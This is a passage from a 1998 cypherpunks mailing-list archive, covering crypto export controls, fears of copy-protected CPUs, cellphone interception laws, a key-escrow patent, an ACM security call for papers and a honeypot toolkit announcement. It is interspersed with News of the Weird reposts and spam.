Also, a number of routers either currently or soon will support crypto;
if you're already using one brand on both ends then you can set up
the crypto features, but if you're doing higher speeds you may have
performance limitations.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Sun, 8 Mar 1998 14:34:37 -0800 (PST)
To: Dave Emery <vin@shore.net>
Subject: Re: [LEGAL] Crypto as Contraband?
In-Reply-To: <v04003a0ab1286f51f62e@[198.115.179.81]>
Message-ID: <v0311072bb128caa922b5@[207.94.249.79]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:35 PM -0800 3/8/98, Dave Emery wrote:
>	What scares me, as I have said before on this list, is what
>happens when future tamperproof Intel CPUs acquire the ability to run
>encrypted code decrypted inside the processor and all copies of Windows
>2001 are completely unpatchable and opaque (without breaking the crypto)
>and nicely jiggered to enforce rules about what programs are allowed to
>do what or even run at all.

I think the logical result of the wide-spread deployment of such systems in
the US is loss of leadership in technology.  Modern technology is very
dependent on high performance software.  Between cutting off small scale
development and pissing off licensed developers, it sounds like a way to
cut the nation's throat.

It is hard to see how you could make an OS that prevented you from building
a Touring machine and still support the generalized programming needed for
technological leadership.  I expect that encrypted instruction streams will
only be used for copy protection, probably with the same market acceptance
that other copy protection schemes have received.


-------------------------------------------------------------------------
Bill Frantz       | If hate must be my prison  | Periwinkle -- Consulting
(408)356-8506     | lock, then love must be    | 16345 Englewood Ave.
frantz@netcom.com | the key.     - Phil Ochs   | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Emery <die@die.com>
Date: Sun, 8 Mar 1998 13:35:04 -0800 (PST)
To: Vin McLellan <vin@shore.net>
Subject: Re: [LEGAL] Crypto as Contraband?
In-Reply-To: <v03102809b1265edd4202@[207.167.93.63]>
Message-ID: <19980308163525.22538@die.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, Mar 08, 1998 at 01:55:29PM -0500, Vin McLellan wrote:
> 
> 	Whoever at NSA decided that the US national security interests in
> crippled-crypto products, such as it is, could be sustained by such a
> mechanism obvously never heard of the 2600 tone, once the biggest secret of
> the telephone companies. And those who ignore the past, etc., etc....

	As someone who was alive and curious back then (mid 60's), I'd
take issue with this.  I found plenty of technical papers in the Bell
System Technical Journal proudly describing so called SF E&M signalling
(which uses 2600 hz) in great detail, along with MFKP  (blue box tones)
and the whole signalling and switching architecture of the (then) Bell
system. They were proud of what they had developed and quite willing to
share it with the technical community - it was no dark secret at all. 
There was even a technical paper that described in detail a bizzare two
frequency one transistor oscillator that allowed them to build what was
essentially a blue box into a operator console keypad.

	The problem was that nobody outside of a few insider engineers
with devious twisted hacker style imaginations  and the spook agency
types had ever asked what might happen if you sent these in-band tones
down the line from a subscriber telephone at just the right (or wrong)
moments, and what it might be possible to do with this knowlage.  
Nobody else knew or cared to find out what might happen if...

	It is a sad day for US national security if people entrusted
with protecting it don't think about how to defeat the protections they
put in place because they are linear thinkers hobbled by the idea that
everyone will do only the most obvious things.  But I really think that
they perfectly well know that current software can be easily patched to
defeat controls, and that there is little they can do  about it.  Nor is
the threat from software patches to Netscape really likely to endanger
much, since there is already a lot of software like PGP available that
is already strong.  In fact I rather suspect that they are quite happy
to see that patch in ciculation since it substantially bolsters their
long held insistance that all crypto be implemented in tamperproof
hardware chips and not software.

	What scares me, as I have said before on this list, is what
happens when future tamperproof Intel CPUs acquire the ability to run
encrypted code decrypted inside the processor and all copies of Windows
2001 are completely unpatchable and opaque (without breaking the crypto)
and nicely jiggered to enforce rules about what programs are allowed to
do what or even run at all.  

-- 
	Dave Emery N1PRE,  die@die.com  DIE Consulting, Weston, Mass. 
PGP fingerprint = 2047/4D7B08D1 DE 6E E1 CC 1F 1D 96 E2  5D 27 BD B0 24 88 C3 18





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Emery <die@die.com>
Date: Sun, 8 Mar 1998 14:47:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [LEGAL] Crypto as Contraband?
In-Reply-To: <v03102809b1265edd4202@[207.167.93.63]>
Message-ID: <19980308174741.48691@die.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, Mar 08, 1998 at 04:35:25PM -0500, Dave Emery wrote:
> On Sun, Mar 08, 1998 at 01:55:29PM -0500, Vin McLellan wrote:
> > 
> 	What scares me, as I have said before on this list, is what
> happens when future tamperproof Intel CPUs acquire the ability to run
> encrypted code decrypted inside the processor and all copies of Windows
> 2001 are completely unpatchable and opaque (without breaking the crypto)
> and nicely jiggered to enforce rules about what programs are allowed to
> do what or even run at all.  
> 
	To amplify my point a bit, it is widely reported that Bill Gates
(who is alleged to have started out in business by pirating and selling
DEC software as a high school student) has a particularly keen desire to
control the widespread piracy of MS products.  His aggressive pushes to
assert his property rights are well known (and not atypical of reformed
sinners if the probably apocryphal report is true). 

	And Microsoft, with its enormous market share of Wintel
software, has a very strong incentive to push for implementation of
copyright controls and smartcard authentication for its products into
the basic architecture of PCs.  And guess what - it controls the high
level architecture of the worlds PCs pretty much entirely by its
monopoly control of the major operating systems that run on them.   So
it seems frighteningly likely that Microsoft - which would stand to gain
a lot of money now lost to piracy from such a feature - will very gladly
do all it can to see that crypto based strong copyright enforcement is
built into the hardware and inner regions of the operationg system of
Wintel systems.

	And making this work clearly requires that the relevant parts of
the inner kernel be unmodifiable (easy to do with digital signatures),
and probably kept extremely secret (easy to do with crypto).  In such an
environment it is awfully easy to strike a deal with the government that
adds a little piece or two of code in that black inner space in exchange
for a bending a bit on anti-trust enforcement.  


-- 
	Dave Emery N1PRE,  die@die.com  DIE Consulting, Weston, Mass. 
PGP fingerprint = 2047/4D7B08D1 DE 6E E1 CC 1F 1D 96 E2  5D 27 BD B0 24 88 C3 18





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: harding_david@hotmail.com
Date: Sun, 8 Mar 1998 17:38:59 -0800 (PST)
To: harding_david@hotmail.com
Subject: Bad/No Credit? FIX IT YOURSELF FREE
Message-ID: <199803090138.SAA21617@bobcat.sni.net>
MIME-Version: 1.0
Content-Type: text/plain


If you want to fix your bad credit or establish AAA credit
in less than 30 days, for FREE,  you MUST Click Here !

You will get 2 special free gifts just for visiting my site!

Thanks for reading this! I will NOT mail to you again!
Click Here  To be promptly removed from our list.
















EPsUn999





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "'die@die.com'" <die@die.com>
Date: Sun, 8 Mar 1998 17:59:18 -0800 (PST)
To: Ernest Hua <Hua@teralogic-inc.com>
Subject: Re: Encryption export controls are a rationalization of a "cheat"
In-Reply-To: <413AC08141DBD011A58000A0C924A6D50D7DC5@MVS2>
Message-ID: <19980308205943.36290@die.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, Mar 08, 1998 at 01:59:53PM -0800, Ernest Hua wrote:

> today.  I am not aware of what cellular spectrum chip sets are available
> via Wyle or some other distributor, but I wouldn't be surprised if the
> cost of a digital intercept equivalent gear would be much more than $300
> in parts plus a 300MHz PC (to decode the intercepted stream).

	I don't think I'll bother the list with this, but a big problem
with cellphones is that people have cellphones.  And cellphones are
generally not designed to be tamperproof (in many cases little or no
effort in this cost competitive market has gone into this) so making
a real cellphone serve as the front end to a snooping system has and will
be done and in fact be the easiest hack engineering solution.

> 
> The question is, what is worth the potential interceptor's time and
> money to do this?  It's obvious that politics is enough for the Florida
> couple (in the Gingrich case).  For a college-age hacker, "because I can
> do it" plus "I work in a well-stocked University lab" is probably enough
> reason.  I won't venture to guess what is worth a criminal's time and
> money, but surely existing models for analog piracy behavior is enough
> to characterize the trade-offs.

	There are lots and lots of people who like to be spectators
and are keenly interested in other people's affairs.  All of us are
to some degree - witness the feeding frenzy over the Monica affair -
and some guestimates have estimated that perhaps as much as 40% of
analog cell calls near large cities are being eavesdropped on by
at least one other person.

> 
> In short, we violently agree on the technical plus behavioral front.
> But we are preaching to the choir.  The real audience for a
> easy-to-understand summary is Congress.  They need to understand that
> the assumptions 30 years ago do not apply today.  And that market demand
> for more and more technically-literate engineering professionals along
> with the phenomenal downward price spiral in PC's and consumer
> electronics gear will simply make those assumptions even less applicable
> in the future.

	That problem is getting worse rather than better.  The media 
depiction of the mysterious "hacker" long haired mad kid intent on evil
invasion of the worlds computers is helping create the illusion
that there is a separate techno criminal class.  But the reality is
that more and more people are crossing the barriers that the older lawyers
in congress never tried to cross and learning something about technology 
and software.   And these people are the guy next door with the cute
kids, not fringe crazies.   And the evil net allows information to
become available much more widely than before.

> 
> Regarding my moral or ethical argument, I am using the fuzzy standard
> set by what society will accept or not accept.

	From my perspective, there are deep divisions and ambivalences
in what the US people will tolerate.  They hate the idea of being spied open
but buy nanny cams and gobble up spy novels and TV shows.   They purchase
millions of police scanners and react in horror when Linda Tripp tapes 
a conversation to protect her ass.   And they expect the US government
to be on top of events around the world and have inside knowlage of 
other governments and react in horror when their spies are unmasked
within our walls, and their eavesdropping gets shown on the nightly
news.  And cities install more and more cameras and bosses read more
email and listen to more calls on business phones every year.


>  I don't think I need to
> argue that most American citizens will be really really pissed if they
> found out that the NSA is spying here via their British counterparts, or
> that the FBI has conducted far more intercepts than they officially
> report.

	Yes, its definately sausage but it tastes good...


>  I am definitely not arguing that the FBI or the NSA has any
> obligation to inform the public of what weaknesses they use to gain an
> intercept advantage.  What concerns most people is that they see
> (correctly) that the NSA's advantage was not based on technical
> superiority, but on the ignorance of everyone else.

	That is true, and it is also sadly true that a lot of their
effort has gone into frank deception, and active determined efforts to block
those of us who have been fighting for incorperating at least minimal
crypto communications security into the infrastructure.

	The Internet is ending this era, however, because it is no
longer possible to control the flow of information and news about 
communications security and crypto, and slowly the holes will get
plugged.

  People do get more
> intelligent over time, and the rapid public gain in the cryptography
> area has pretty much wiped out the gains the NSA has depended on over
> the last 50 years.  If the average person understands that what the FBI
> and the NSA REALLY want is for you to be stupid (at least in the area of
> communications security), then there would be an uproar.
> 
	This is happening, and that is why Louie is grabbing desperately
for the last chance... and why congress is busily passing anti scanner
bills to solve the cellphone privacy problem that don't mention a thing
about cryptography.

	Their desparate hope is if they say it solomnly enough and with
enough ceremony the public will see the emporer's clothes


-- 
	Dave Emery N1PRE,  die@die.com  DIE Consulting, Weston, Mass. 
PGP fingerprint = 2047/4D7B08D1 DE 6E E1 CC 1F 1D 96 E2  5D 27 BD B0 24 88 C3 18





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Roger H Tancrell <roger@world.std.com>
Date: Sun, 8 Mar 1998 18:24:22 -0800 (PST)
To: cypherpunks@ssz.com
Subject: Wrong Address???
Message-ID: <Pine.SGI.3.95.980307175716.5223B-100000@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain


To Cypherpunks:

In the last couple days, I have received many, many e-mail messages.

How did I get your your group list???  Perhaps, you have the wrong
"Roger".

Please remove my name.

Thanks.  Roger Tancrell







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Mon, 9 Mar 1998 17:42:32 -0800 (PST)
To: Wilhelm Geiger III <do@2me.dash>
Subject: Re: The Filth Dogman of the Surveillance Apocalypse
In-Reply-To: <35048609.5EB4@2me.dash>
Message-ID: <Pine.BSF.3.91.980309062944.3862B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




Toto needs to study the bat book.

On Mon, 9 Mar 1998, Wilhelm Geiger III wrote:

> * In August, two cities debated plans to reduce the amount of dog
> poop in municipal parks and on sidewalks.  The city of




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 9 Mar 1998 04:10:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: Matt Blaze KE Patent
Message-ID: <1.5.4.32.19980309121223.007120d4@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


9 March 1998, MicroPatent:

Escrow key management system for accessing encrypted data with 
portable cryptographic modules (Assignee -- Lucent Technologies 
Inc.)

Abstract: A cryptographic module, such as a smartcard, is 
designed to a) store decrypting software programs, and information 
indicative of predetermined conditions under which an escrow agent 
is enabled to use the software programs stored on the module to 
decrypt encrypted data files, and b) records for audit purposes, 
information indicating every time the software programs are used 
for decryption. 

Ex Claim Text: A system for managing access to one or more 
encrypted data files stored in a computer system, said system 
comprising: a file of the computer system which associates a 
cryptographic key with a cryptographic module that is subsequently 
assigned to a selected user; a memory of the cryptographic module 
which stores a) access information allowing use of the cryptographic 
module by the selected user under specific conditions, said access 
information including the cryptographic key, a corresponding 
cryptographic passphrase and a software program to decrypt the one 
or more encrypted data files; means responsive to receiving at said 
cryptographic module said corresponding cryptographic passphrase 
from said selected user, for a) permitting decryption of said one 
or more data flies when the specific conditions are met, and b) 
recording in said memory transactional information associated with 
said decryption, and b) uses said cryptographic module for the 
purpose of decrypting one or more of said data files; and means for 
querying at a later time said cryptographic module to retrieve said 
transactional information recorded on said memory.

Assignee: Lucent Technologies Inc. 

Patent Number: 5721777 

Issue Date: 1998 02 24 

Inventor(s): Blaze, Matthew A. 

If you would like to purchase a copy of this patent, please call 
MicroPatent at 800-648-6787. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gene Tsudik <tsudik@pollux.usc.edu>
Date: Mon, 9 Mar 1998 09:02:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: Final CFP: 5th ACM Conference on Computer and Communications Security
Message-ID: <199803091701.JAA20079@pollux.usc.edu>
MIME-Version: 1.0
Content-Type: text/plain



                          Final Call for Papers

                          Fifth ACM Conference on
                    Computer and Communications Security

                          San Francisco, California
                             November 3-5, 1998
                           Sponsored by ACM SIGSAC

Papers offering novel research contributions in any aspect of computer
security are solicited for submission to the Fifth ACM Conference on
Computer and Communications Security. Papers may present theory, technique,
applications, or practical experience on topics including but not limited to

 access control         authentication           accounting and audit

 mobile code security   applied cryptography     data/system integrity
 
 cryptographic          electronic commerce      intrusion detection
 protocols

 key management         privacy and anonymity    intellectual property
                                                 protection

 information warfare    secure networking        secure operating systems

 viruses and worms      security management      distributed systems
                                                 security

 database security      smart-cards and secure   security verification
                        PDAs

Accepted papers will be presented at the conference and published by the ACM
in a conference proceedings. Outstanding papers will be invited for possible
publication in ACM Transactions on Information and System Security.

Instructions for paper submissions: Submitted papers must not substantially
overlap papers that have been published or that are simultaneously submitted
to a journal or a conference with a proceedings. Papers should be at most 15
pages excluding the bibliography and well-marked appendices (using 11-point
font and reasonable margins on 8.5'x11' paper), and at most 20 pages total.
Committee members are not required to read the appendices, and so the paper
should be intelligible without them. Papers should be submitted in a form
suitable for anonymous review (no author names or affiliations).

   * Send via email to reiter@research.att.com a plain ASCII text message
     containing the title and abstract of your paper, the authors' names,
     email and postal addresses, phone and fax numbers, and identification
     of the contact author.

   * In addition, submit your paper using ONE of the following two methods.

        o Electronic submission (preferred): Instructions for submitting
          your Postscript paper by e-mail can be obtained from
          http://www.research.att.com/~reiter/ccs5/esub.html or by sending
          email to ccs98@research.att.com with the Subject line containing
          "HELP". It is strongly recommended that you electronically submit
          your paper at least five days in advance of the submission
          deadline, to allow us adequate time to verify that we can print
          your paper (and if not, to allow you to submit your paper in
          hardcopy to be received by the submission deadline). We cannot be
          held responsible for papers that we cannot print.

          OR

        o Hardcopy submission: Send eighteen (18) copies of your paper to
          the program chair at the address below with a cover letter
          indicating that your paper is a submission for the 5th ACM
          Conference on Computer and Communications Security, and listing
          the authors' names, email and postal addresses, phone and fax
          numbers, and identifying the contact author.

Submissions received after the submission deadline will be rejected without
review. Where possible all further communications to authors will be via
email.

                  Paper submissions due:    April 3, 1998
                  Acceptance notification:  June 5, 1998
                  Final papers due:         July 16, 1998

Instructions for panel proposals The conference may include panel sessions
addressing topics of interest to the computer security community. Proposals
for panels should be no longer than five (5) pages in length and should
include possible panelists and an indication of which of those panelists
have confirmed participation. Send two (2) hardcopies of your proposal to
the program chair at the address below with a cover letter indicating that
your proposal is for the 5th ACM Conference on Computer and Communications
Security, and listing the proposers' names, email and postal addresses, and
phone and fax numbers.

                   Panel proposals due:     May 1, 1998
                   Acceptance notification: June 5, 1998

 Steering committee chair: Ravi Sandhu, George Mason University
 General chair:            Li Gong, JavaSoft

 Program chair:            Mike Reiter
                           AT&T Labs, Room A269, 180 Park Avenue
                           Florham Park, NJ 07932-0971 USA
                           phone: +973-360-8349

 Awards chair:             Jacques Stern, ENS/DMI
 Publication chair:        Stuart Stubblebine, AT&T Labs
 Publicity chair:          Gene Tsudik, USC ISI

Program committee:
 Martin Abadi, DEC SRC              David Naccache, Gemplus
 Bill Cheswick, Lucent/Bell Labs    Hilarie Orman, DARPA/ITO
 Carl Ellison, Cybercash            Avi Rubin, AT&T Labs--Research
 Ed Felten, Princeton University    Pierangela Samarati, Universita di Milano
 Paul Karger, IBM T.J. Watson       Gene Tsudik, USC ISI
 Steve Kent, BBN Corporation        Paul Van Oorschot, Entrust Technologies
 Ueli Maurer, ETH Zurich            Bennet Yee, UCSD
 Cathy Meadows, Naval Res. Lab      Moti Yung, CertCo

For more information, visit http://www.research.att.com/~reiter/ccs5
 			or  http://www.isi.edu/~gts/cfp.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Mon, 9 Mar 1998 10:05:41 -0800 (PST)
To: die@die.com>
Subject: RE: Crypto as contraband
In-Reply-To: <19980306231001.53809@die.com>
Message-ID: <3.0.5.32.19980309094018.007be4f0@otc.net>
MIME-Version: 1.0
Content-Type: text/plain



>> 	So yes, they have done at least as bad a thing to people who
>> merely want to tinker with their radios and occasionally explore what is
>> out there in the ether by passively and in private receiving radio
>> signals as they have to gun owners,

The morons in congress responded to intercepts of cellphones.  Because
Newt was scanned.  Response: outlaw *cellphones*... which are 
themselves typically programmable as scanners of cell freqs.  And scanners
and programmable RF receivers.

Someone should pick up a congresscritter's monitor (a la van Eyk), then let
them 
make fools of themselves banning television receivers... as video tempest
receiving gear...

[NB: since television Ch 83 overlaps with a cell-phone channel, TVs are
already illegal
under this law, no?  Selling an old analog b/w TV is now punishable by 1/2
million fine... ]

Are they going to ban IR lasers since they can be used to listen to window
vibration?

Remember Tacitus.










------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

"I do believe that where there is a choice only between cowardice and
    violence, I would advise violence." Mahatma Gandhi








	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jtsr-stock@jtsr-stock.com
Date: Mon, 9 Mar 1998 09:48:50 -0800 (PST)
Subject: JT's Restarants - Excellent Undervauled Investment Opportunity
Message-ID: <199803091748.JAA04824@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


To be removed from our mailing list please reply to this message with 
"REMOVE" in the subject.

Recently we wrote you to tell about an excellent investment opportunity 
in JT's Restaurants (OTC BB: JTSR).  Since our last message was sent 
JTSR has risen in value over 40% (from Feb 17, 1998 to March 6, 1998).  
This is just the beginning.  This is still a ground floor opportunity.  
If you would like more information about this exciting investment 
opportunity please visit our web site at http://www.jtsr-stock.com or 
call 1-888-295-6365 for complete information.

The contents of this message have been provided for the review of 
potential investors only and does not constitute an offering of 
securities.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sara@iddqd.org
Date: Mon, 9 Mar 1998 10:00:38 -0800 (PST)
To: preferredcustomer
Subject: Free Insurance Quote
Message-ID: <199803091800.KAA04912@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


DO YOU WANT LIFE INSURANCE FROM THE BEST COMPANIES AT THE 
LOWEST PRICE? 

COMPANIES LIKE:

Security Connecticut, First Colony Life, Lincoln Benefit Life, Life of
Virginia, Midland, Mutual of Omaha, New York Life, and many, many others!

COMPARE YOUR CURRENT COVERAGE to these 10-year level term sampler, monthly
premiums for super-preferred non-smokers.

Age       $100,000             $250,000             $500,000
         Male    Female    Male    Female    Male    Female
30   $10.00   $10.00    $17.00   $15.00    $28.00   $24.00
40   $12.00   $11.00    $21.00   $19.00    $36.00   $32.00
50   $21.00   $17.00    $44.00   $33.00    $82.00   $59.00
60   $43.00   $29.00    $99.00   $63.00    $193.00  $119.00

Are you paying too much for coverage?  Chances are we can help!  With past
cases, our insurance professionals have SAVED THEIR CLIENTS AS MUCH AS 60%
IN ANNUAL PREMIUMS!

Visit http://www.servicebrokers.com/life_insurance.htm  for a FREE rate quote TODAY!

Our members shop the market for you to offer the lowest priced "A" and
above rated Life Insurance companies in your state!  Why waste YOUR time
and MONEY with a one-company agent?

To receive your FREE NO OBLIGATION quote, please:

Visit http://www.servicebrokers.com/life_insurance.htm
or 
http://www.servicebrokers.com/health_insurance.htm


for  individuals and  businesses

If you do not wish to receive information regarding, life, health and other insurance
related offers as well as information on home loans. please click here:

mailto:sara@iddqd.org?subject=remove











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jtsr-stock@jtsr-stock.com
Date: Mon, 9 Mar 1998 14:12:47 -0800 (PST)
Subject: JT's Restarants - Excellent Undervauled Investment Opportunity
Message-ID: <199803092212.OAA07415@cygint.cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


To be removed from our mailing list please reply to this message with 
"REMOVE" in the subject.

Recently we wrote you to tell about an excellent investment opportunity 
in JT's Restaurants (OTC BB: JTSR).  Since our last message was sent 
JTSR has risen in value over 40% (from Feb 17, 1998 to March 6, 1998).  
This is just the beginning.  This is still a ground floor opportunity.  
If you would like more information about this exciting investment 
opportunity please visit our web site at http://www.jtsr-stock.com or 
call 1-888-295-6365 for complete information.

The contents of this message have been provided for the review of 
potential investors only and does not constitute an offering of 
securities.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tm@dev.null>
Date: Mon, 9 Mar 1998 16:50:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: [WAREZ]  Mr. Hankey claims squatter's rights
Message-ID: <35047490.456C@dev.null>
MIME-Version: 1.0
Content-Type: text/plain


* The show business newspaper Daily Variety reported in December
that John Kricfalusi, creator TV's "The Ren & Stimpy Show," was
threatening legal action against the producers of the Comedy Central
show "South Park" for ripping off a cartoon character.  According to
Kricfalusi, his character "Nutty the Friendly Dump," an animated piece
of excrement, must have been the basis for "South Park"'s "Mr. Hankey
the Christmas Poo," a holiday-dressed, singing, dancing piece of
excrement.

~~~~~~~~~~~~
WEIRDNUZ.520 (News of the Weird, January 23, 1998)
by Chuck Shepherd

NEWS OF THE WEIRD, founded in 1988, is a nationally syndicated
newspaper column distributed by Universal Press Syndicate.  To
receive the columns by e-mail, free of charge, send a message to
notw-request@nine.org with the Subject line of Subscribe.  To read
these News of the Weird newspaper columns from the past six months,
go to http://www.nine.org/notw/notw.html  (That site contains no
graphics, no photos, no video clips, no audio.  Just text.  Deal
with it.)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tm@dev.null>
Date: Mon, 9 Mar 1998 16:50:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: D.C.'s  Sister City?
Message-ID: <350476A6.51E4@love.cum>
MIME-Version: 1.0
Content-Type: text/plain


* According to a report in the Washington Post in November, armed
robbers in the large Nigerian trading city of Onitsha are so bold, and
the police so outmanned, that they often notify the victims in advance
that they will be coming to rob them, to encourage the residents to be
away from the house at the time.  A few days after the police
announced a crackdown, one gang of 50 armed robbers cordoned off
a street and looted every apartment building on the block.


~~~~~~~~~~~~
WEIRDNUZ.520 (News of the Weird, January 23, 1998)
by Chuck Shepherd

NEWS OF THE WEIRD, founded in 1988, is a nationally syndicated
newspaper column distributed by Universal Press Syndicate.  To
receive the columns by e-mail, free of charge, send a message to
notw-request@nine.org with the Subject line of Subscribe.  To read
these News of the Weird newspaper columns from the past six months,
go to http://www.nine.org/notw/notw.html  (That site contains no
graphics, no photos, no video clips, no audio.  Just text.  Deal
with it.)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blanc@cover.ed>
Date: Mon, 9 Mar 1998 16:50:47 -0800 (PST)
To: cypherpunks@toad.com
Subject: The Revolution is  NOW! (Think about it, Gertrude...over a Stein of beer, perhaps?)
Message-ID: <35047968.23C7@cover.ed>
MIME-Version: 1.0
Content-Type: text/plain


* What Goes Around, Comes Around:  Since taking control of
most of Afghanistan in September 1996, the religious Taliban army
has enforced strict, conservative Islamic rule, especially regarding
the work, recreation, and dress of women.  Now, according to a
report in the London Daily Telegraph in November, a splinter
Muslim group about 200 miles north of Kabul has begun to train a
women-only battalion to fight the Taliban.  Females from the
Hazaras, a Turkic Mongol ethnic group, have been training at a
secret location and will soon begin a major recruiting campaign.

~~~~~~~~~~~~
WEIRDNUZ.520 (News of the Weird, January 23, 1998)
by Chuck Shepherd

NEWS OF THE WEIRD, founded in 1988, is a nationally syndicated
newspaper column distributed by Universal Press Syndicate.  To
receive the columns by e-mail, free of charge, send a message to
notw-request@nine.org with the Subject line of Subscribe.  To read
these News of the Weird newspaper columns from the past six months,
go to http://www.nine.org/notw/notw.html  (That site contains no
graphics, no photos, no video clips, no audio.  Just text.  Deal
with it.)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Hughes <hughes@huge.cum>
Date: Mon, 9 Mar 1998 16:50:54 -0800 (PST)
To: cypherpunks@toad.com
Subject: CypherPunks -- The Early Years
Message-ID: <35047ADA.2EEF@huge.cum>
MIME-Version: 1.0
Content-Type: text/plain


* William Garland, the father of the late rap singer Tupac Shakur,
fighting for part of Shakur's multi-million-dollar estate in Los
Angeles in August, despite his having had no contact with his son
after age five, pointed out at a hearing how he was a good father.
For example, he said he would often tuck in little Tupac, a bed-
wetter, with another Garland son, also a bed-wetter:  "They could
pee with each other."

~~~~~~~~~~~~
WEIRDNUZ.520 (News of the Weird, January 23, 1998)
by Chuck Shepherd

NEWS OF THE WEIRD, founded in 1988, is a nationally syndicated
newspaper column distributed by Universal Press Syndicate.  To
receive the columns by e-mail, free of charge, send a message to
notw-request@nine.org with the Subject line of Subscribe.  To read
these News of the Weird newspaper columns from the past six months,
go to http://www.nine.org/notw/notw.html  (That site contains no
graphics, no photos, no video clips, no audio.  Just text.  Deal
with it.)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David W. Crawford" <dc@panix.com>
Date: Mon, 9 Mar 1998 12:31:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: Fred Cohen's The Deception ToolKit (fwd)
Message-ID: <42>
MIME-Version: 1.0
Content-Type: text/plain


>From comp.risks digest 19.62
 
> ------- Start of forwarded message -------
> Date: Mon, 9 Mar 1998 05:52:28 -0800 (PST)
> From: Fred Cohen <fc@all.net>
> Subject: The Deception ToolKit
> 
> I would like to announce and introduce a new security tool available for free
> from over the Internet - The Deception ToolKit - available from http://all.net/
> 
> The Deception ToolKit (DTK) is a toolkit designed to give defenders a couple
> of orders of magnitude advantage over attackers. 
> 
> The basic idea is not new. We use deception to counter attacks. In the case
> of DTK, the deception is intended to make it appear to attackers as if the
> system running DTK has a large number of widely known vulnerabilities. DTK's
> deception is programmable, but it is typically limited to producing output
> in response to attacker input in such a way as to simulate the behavior of a
> system which is vulnerable to the attackers method. This has a few
> interesting side effects: 
> 
>   It increases the attacker's workload because they can't easily tell
>   which of their attack attempts works and which fail. For example, if
>   an attack produces what appears to be a Unix password file, the
>   attacker would normally run "Crack" to try to break into the system.
>   But if the password file is a fake, it consumes the attackers time and
>   effort to no result. 
> 
>   It allows us to track attacker attempts at entry and respond before
>   they come across a vulnerability we are susceptible to. For example,
>   when the attacker tries to use a known Sendmail attack against our
>   site, we record all of their entries to track their techniques. With
>   this deception in place, we have no problem picking up port scans,
>   password guessing, and all manner of other attack attempts as they happen. 
> 
>   It sours the milk - so to speak. If one person uses DTK, they can see
>   attacks coming well ahead of time. If a few others start using it, we
>   will probably exhaust the attackers and they will go somewhere else to
>   run their attacks. If a lot of people use DTK, the attackers will find
>   that they need to spend 100 times the effort to break into systems and
>   that they have a high risk of detection well before their attempts succeed.
> 
>   If enough people adopt DTK and work together to keep it's deceptions
>   up to date, we will eliminate all but the most sophisticated
>   attackers, and all the copy-cat attacks will be detected soon after
>   they are released to the wide hacking community. This will not only
>   sour the milk, it will also up the ante for would-be copy-cat
>   attackers and, as a side effect, reduce the "noise" level of attacks to
>   allow us to more clearly see the more serious attackers and track them down. 
> 
>   If DTK becomes very widespread, one of DTK's key deceptions will
>   become very effective. This deception is port 507 - which we have
>   staked a claim for as the deception port. Port 507 indicates whether
>   the machine you are attempting to connect to is running a deception
>   defense. Naturally, attackers who wish to avoid deceptive defenses
>   will check there first, and eventually, simply running the deceptive
>   defense notifier will be adequate to eliminate many of the attackers.
>   Of course some of us defenders will not turn on the deception
>   announcement message so we can track new attack attempts by those who
>   avoid deceptive defenses, so... the attacker's level of uncertainty
>   rises, and the information world becomes a safer place to work. 
> 
> Your positive and helpful comments are appreciated.  FC
> 
> Fred Cohen & Associates: http://all.net - fc@all.net - tel/fax:510-454-0171------- End of forwarded message -------


David W. Crawford    <dc@panix.com>
Los Gatos, CA        <david@ricochet.net>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jtatz@chemistry.ohio-state.edu
Date: Mon, 9 Mar 1998 14:32:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: Crypto as contraband
Message-ID: <350453B0.7E32@accessatlanta.com>
MIME-Version: 1.0
Content-Type: text/plain


> The morons in congress responded to intercepts of cellphones.  Because
> Newt was scanned.  Response: outlaw *cellphones*... which are
> themselves typically programmable as scanners of cell freqs.  > And scanners
